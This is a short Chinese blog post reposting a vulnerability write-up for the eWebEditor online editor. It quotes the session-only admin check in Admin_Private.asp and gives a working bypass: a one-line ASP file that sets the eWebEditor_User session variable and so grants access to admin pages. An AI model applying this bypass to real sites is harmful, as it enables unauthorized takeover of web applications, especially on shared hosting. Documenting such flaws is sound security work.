eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%
If Session(“eWebEditor_User”) = “” Then
Response.Redirect “admin_login.asp”
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session(“eWebEditor_User”) = “11111111″%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp
漏洞影响:虚拟主机的克星.
林网博客
探讨计算机网络安全 拓展计算机网络应用
eWebEditor session欺骗漏洞
269 views
分类 : 技术文摘 | 发布时间 : 03-12-2005
Comments (2)
随机文章
近期热评文章
- 三星I9003比较好用的通话录音软件 (4)
- 不看名人只看名言 补充自己需要的 (1)
-
最近发表文章
最新评论
- linker : 不大,但可以杜绝新网等dns出现故障时情况,毕竟dnspod故障率相当低,另外,dnspod如果修改...
- linker : root过的;终极录音正常,但会造成挂不了电话、录音无法长时间持续情况;另外一个total reca...
- 土木坛子 : 用DNSPOD对速度提高作用大吗?
- 黑梦 : 这两个软件我都试过,i9003根本不买账。请问怎么回事?要么就是保存的录音文件为零,要么软件直接死掉...
- 创业新鲜事 : 有句话说的好,不服气不行哈哈!
- Isaac : 枪文。
- KEN : 帮别人修的旧机,声卡驱动找了两晚没找到,现在问题解决,太谢谢你了
- 游戏评测 : 现在智能手机这些功能都能实现吧,有的手机就能实现,还有很多软件也可以实现。
- 高低温循环装置 : 有i9100的好软件吗?
- 宁波办公耗材配送 : 我也新做了个博客,跟博主的主题一样。不知道能不能与贵博客换个友情链接
-
Archives
- 2012 年一月
- 2011 年十二月
- 2011 年十一月
- 2011 年十月
- 2011 年九月
- 2011 年八月
- 2011 年七月
- 2011 年六月
- 2011 年五月
- 2011 年四月
- 2011 年三月
- 2011 年二月
- 2011 年一月
- 2010 年十二月
- 2010 年十一月
- 2010 年十月
- 2010 年九月
- 2010 年八月
- 2010 年七月
- 2010 年六月
- 2010 年五月
- 2010 年四月
- 2010 年三月
- 2010 年二月
- 2010 年一月
- 2009 年十二月
- 2009 年十一月
- 2009 年十月
- 2009 年九月
- 2009 年八月
- 2009 年七月
- 2009 年六月
- 2009 年五月
- 2009 年四月
- 2009 年三月
- 2009 年二月
- 2009 年一月
- 2008 年十二月
- 2008 年十一月
- 2008 年十月
- 2008 年九月
- 2008 年八月
- 2008 年七月
- 2008 年六月
- 2008 年五月
- 2008 年四月
- 2008 年三月
- 2008 年二月
- 2008 年一月
- 2007 年十二月
- 2007 年十一月
- 2007 年十月
- 2007 年九月
- 2007 年八月
- 2007 年七月
- 2007 年六月
- 2007 年五月
- 2007 年四月
- 2007 年三月
- 2007 年二月
- 2007 年一月
- 2006 年十二月
- 2006 年十一月
- 2006 年十月
- 2006 年九月
- 2006 年八月
- 2006 年七月
- 2006 年六月
- 2006 年五月
- 2006 年四月
- 2006 年三月
- 2006 年二月
- 2006 年一月
- 2005 年十二月
- 2005 年十一月
- 2005 年十月
- 2005 年九月
- 2005 年八月
- 2005 年七月
-
Blog Links
© All Rights Reserved. 林网博客
Powered by : Wordpress | Designed by : WebDesignLessons.com |
你做实际做过吗?没有操作过就不要在这乱抄.这连最基本的原理都不知.见到网上有就乱抄.原来是垃圾
不了解历史就不要过早的下结论。欢迎讨论!